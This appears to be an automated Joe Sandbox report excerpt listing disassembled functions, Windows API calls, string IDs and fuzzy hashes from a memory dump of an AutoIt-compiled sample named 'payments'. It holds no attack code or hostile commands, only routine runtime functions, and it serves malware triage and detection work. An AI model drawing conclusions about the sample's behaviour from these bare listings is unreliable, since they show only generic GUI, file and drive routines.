                                                                                                                          Function 00CB8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CB818F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: d7ea4af325e0f160c1bbd5df14fcbd1c15ff280e997e9af8254fc0b36fdea9e4
                                                                                                                          • Instruction ID: a4508055c247fb97238162873218b3350b54ba3f260a1f3d1f8808ed6d205fbb
                                                                                                                          • Opcode Fuzzy Hash: d7ea4af325e0f160c1bbd5df14fcbd1c15ff280e997e9af8254fc0b36fdea9e4
                                                                                                                          • Instruction Fuzzy Hash: F6A0113000020CBB8F002B82EC08888BF2EEA002A0B208020F80C80220CB22A8228AA2
                                                                                                                          Function 00C9E3B0 Relevance: .5, Instructions: 540COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8e636cbe1fcc9a60c085af77eb088bf14c72c93edebdab040c212143ddd4c82d
                                                                                                                          • Instruction ID: eaa86ca0162fef00596f0349721ec0d560c8ba268638879fed4ce78d158e523d
                                                                                                                          • Opcode Fuzzy Hash: 8e636cbe1fcc9a60c085af77eb088bf14c72c93edebdab040c212143ddd4c82d
                                                                                                                          • Instruction Fuzzy Hash: B0229070D0421ADFDF14DF98C488BAAB7B0FF24304F148169E95A9B391E731AE85DB91
                                                                                                                          Function 00C993F0 Relevance: .5, Instructions: 531COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c1e1446df09a5114fd1c451b9e6e247f66d327df46fef3d016ebb33d0567e36f
                                                                                                                          • Instruction ID: c71d2a1317cd29c9ab24163e8df063ff28dfbe5480e8193220cda01761e1eed0
                                                                                                                          • Opcode Fuzzy Hash: c1e1446df09a5114fd1c451b9e6e247f66d327df46fef3d016ebb33d0567e36f
                                                                                                                          • Instruction Fuzzy Hash: 05127E70A00609DFDF04DFA9D999AEEB7F5FF48300F108569E416E7290EB35A911DB60
                                                                                                                          Function 00C9AF50 Relevance: .5, Instructions: 514COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throwstd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3728558374-0
                                                                                                                          • Opcode ID: ab83c5aaeb10c0803813f9728b867b90eafea0bb042c53ee5f278398dd11379e
                                                                                                                          • Instruction ID: a1cd538dea8b0ee3bb3d5bce3b3efd2891b2a3943b86de1532f60b7426ca4855
                                                                                                                          • Opcode Fuzzy Hash: ab83c5aaeb10c0803813f9728b867b90eafea0bb042c53ee5f278398dd11379e
                                                                                                                          • Instruction Fuzzy Hash: B202A270A00205EBCF04DF68D9956BEB7B5FF45300F148069E80ADB295EB31DE15DBA1
                                                                                                                          Function 00CB02A4 Relevance: .3, Instructions: 345COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                          • Instruction ID: 777e087585a600dd64ef17f2bb65fbe97e8c5ff77c9b083e8581cd150e016b8a
                                                                                                                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                          • Instruction Fuzzy Hash: 03C1B8322051930ADF6D467A84344BFFBA15E927F572A076DD8B3CB4E5EF20CA25D620
                                                                                                                          Function 00CB06D9 Relevance: .3, Instructions: 341COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                          • Instruction ID: e064f2e7e03e3f95e3536d778c449a1198b9a4bb6c7e4113bb151f95cc5e2362
                                                                                                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                          • Instruction Fuzzy Hash: 8CC1A2322051930ADF6D463AC4344BFFBA15AA2BB572A176DD4B3CB4D5EF20DB24D620
                                                                                                                          Function 00CAFA57 Relevance: .3, Instructions: 323COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                          • Instruction ID: 208efe71893016826d26e3c0d380f5519bbc0983aa9699224cab6ce8b4f7364b
                                                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                          • Instruction Fuzzy Hash: E1C1A4322050930ADF6D467AC47447EBBA15AA3BB931A077DD4B3CB5D5EF30CA26D620
                                                                                                                          Function 00CEA2A9 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 490filecommemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CEA2FE
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CEA310
                                                                                                                          • DestroyWindow.USER32 ref: 00CEA31E
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CEA338
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CEA33F
                                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CEA480
                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CEA490
                                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA4D8
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00CEA4E4
                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CEA51E
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA540
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA553
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA55E
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CEA567
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA576
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CEA57F
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA586
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CEA591
                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA5A3
                                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D1D9BC,00000000), ref: 00CEA5B9
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CEA5C9
                                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CEA5EF
                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CEA60E
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA630
                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA81D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                          • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                          • API String ID: 2211948467-3613752883
                                                                                                                          • Opcode ID: c2ec6f5d9bbda82890182f039fdc294c709fbac0ac370b220e8075aa87d911a7
                                                                                                                          • Instruction ID: f4c800d079596a1615dbcf363720dbc7f537cf318edff7fc8ca5cdd954f6f1e5
                                                                                                                          • Opcode Fuzzy Hash: c2ec6f5d9bbda82890182f039fdc294c709fbac0ac370b220e8075aa87d911a7
                                                                                                                          • Instruction Fuzzy Hash: 54024C75900254AFDB14DFA9CD89EAE7BB9FB48310F108158F915EB2A1DB70ED42CB60
                                                                                                                          Function 00CFD285 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00CFD2DB
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD30C
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CFD318
                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00CFD332
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CFD341
                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD36C
                                                                                                                          • GetSysColor.USER32(00000010), ref: 00CFD374
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00CFD37B
                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00CFD38A
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CFD391
                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFD3DC
                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 00CFD40E
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFD439
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(00000012), ref: 00CFD5AE
                                                                                                                            • Part of subcall function 00CFD575: SetTextColor.GDI32(?,?), ref: 00CFD5B2
                                                                                                                            • Part of subcall function 00CFD575: GetSysColorBrush.USER32(0000000F), ref: 00CFD5C8
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(0000000F), ref: 00CFD5D3
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(00000011), ref: 00CFD5F0
                                                                                                                            • Part of subcall function 00CFD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD5FE
                                                                                                                            • Part of subcall function 00CFD575: SelectObject.GDI32(?,00000000), ref: 00CFD60F
                                                                                                                            • Part of subcall function 00CFD575: SetBkColor.GDI32(?,00000000), ref: 00CFD618
                                                                                                                            • Part of subcall function 00CFD575: SelectObject.GDI32(?,?), ref: 00CFD625
                                                                                                                            • Part of subcall function 00CFD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD644
                                                                                                                            • Part of subcall function 00CFD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD65B
                                                                                                                            • Part of subcall function 00CFD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD670
                                                                                                                            • Part of subcall function 00CFD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD698
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3521893082-2594219639
                                                                                                                          • Opcode ID: 1a75cae89b519f534301fa8c4f2e6fc2256f74b5453151456baaf71dde0a3285
                                                                                                                          • Instruction ID: 1bf0f84cb64572e02b4d33891cc35f0951d0a7abb8a3728a446836d7a99668ed
                                                                                                                          • Opcode Fuzzy Hash: 1a75cae89b519f534301fa8c4f2e6fc2256f74b5453151456baaf71dde0a3285
                                                                                                                          • Instruction Fuzzy Hash: D3918071408305BFD7509F64DC08AAB7BABFF89325F104A19FA62D62E0CB35D945CB62
                                                                                                                          Function 00CAB8FD Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 491windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32 ref: 00CAB98B
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CAB9CD
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CAB9D8
                                                                                                                          • DestroyIcon.USER32(00000000), ref: 00CAB9E3
                                                                                                                          • DestroyWindow.USER32(00000000), ref: 00CAB9EE
                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0D2AA
                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D0D2E3
                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00D0D711
                                                                                                                            • Part of subcall function 00CAB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CAB759,?,00000000,?,?,?,?,00CAB72B,00000000,?), ref: 00CABA58
                                                                                                                          • SendMessageW.USER32 ref: 00D0D758
                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0D76F
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00D0D785
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00D0D790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                          • String ID: 0$@U=u
                                                                                                                          • API String ID: 464785882-975001249
                                                                                                                          • Opcode ID: 0402d917fe2cdc129367f5587e986c16354529fe311b65bb72dcf7dbb5b1b6b7
                                                                                                                          • Instruction ID: 278a3dc4a8a1ee74ceb48bac7c7a02d3df2a6e341f50660e694d6af02fe9ff81
                                                                                                                          • Opcode Fuzzy Hash: 0402d917fe2cdc129367f5587e986c16354529fe311b65bb72dcf7dbb5b1b6b7
                                                                                                                          • Instruction Fuzzy Hash: 7A128230504202EFDB15CF64C888BAAB7F6FF45304F58456AE989CB2A2C731EC46DB61
                                                                                                                          Function 00CFD575 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00CFD5AE
                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00CFD5B2
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD5C8
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CFD5D3
                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 00CFD5D8
                                                                                                                          • GetSysColor.USER32(00000011), ref: 00CFD5F0
                                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD5FE
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CFD60F
                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00CFD618
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00CFD625
                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD644
                                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD65B
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD670
                                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD698
                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFD6BF
                                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00CFD6DD
                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 00CFD6E8
                                                                                                                          • GetSysColor.USER32(00000011), ref: 00CFD6F6
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00CFD6FE
                                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFD712
                                                                                                                          • SelectObject.GDI32(?,00CFD2A5), ref: 00CFD729
                                                                                                                          • DeleteObject.GDI32(?), ref: 00CFD734
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00CFD73A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00CFD73F
                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00CFD745
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00CFD74F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 1996641542-2594219639
                                                                                                                          • Opcode ID: b6f8809c83d82f982a88f9a7e4ea9c5f4649b9852e5de99498185e1b75ab28a5
                                                                                                                          • Instruction ID: 967e5cd38e214a3c85f7d8eb065a85c0c535d2eca251711f31dd4283346a7689
                                                                                                                          • Opcode Fuzzy Hash: b6f8809c83d82f982a88f9a7e4ea9c5f4649b9852e5de99498185e1b75ab28a5
                                                                                                                          • Instruction Fuzzy Hash: 72513D71900318BFDB109FA4DC48AEE7B7AEB09324F108515FA16EB2A1DB759A41DB60
                                                                                                                          Function 00CDDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CDDBD6
                                                                                                                          • GetDriveTypeW.KERNEL32(?,00D2DC54,?,\\.\,00D2DC00), ref: 00CDDCC3
                                                                                                                          • SetErrorMode.KERNEL32(00000000,00D2DC54,?,\\.\,00D2DC00), ref: 00CDDE29
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                          • Opcode ID: de2830233a54b42fa9af177855801961acec4722d5478212a175caf053efe108
                                                                                                                          • Instruction ID: ee229176c8eccbfbfb0f0c9daaa4e4e87b341f9817afb2aa15463a976850e3cc
                                                                                                                          • Opcode Fuzzy Hash: de2830233a54b42fa9af177855801961acec4722d5478212a175caf053efe108
                                                                                                                          • Instruction Fuzzy Hash: 4551A630A48742AF8B10DF29C885929B7E2FB94705B24481BF25797391DB70DA49E762
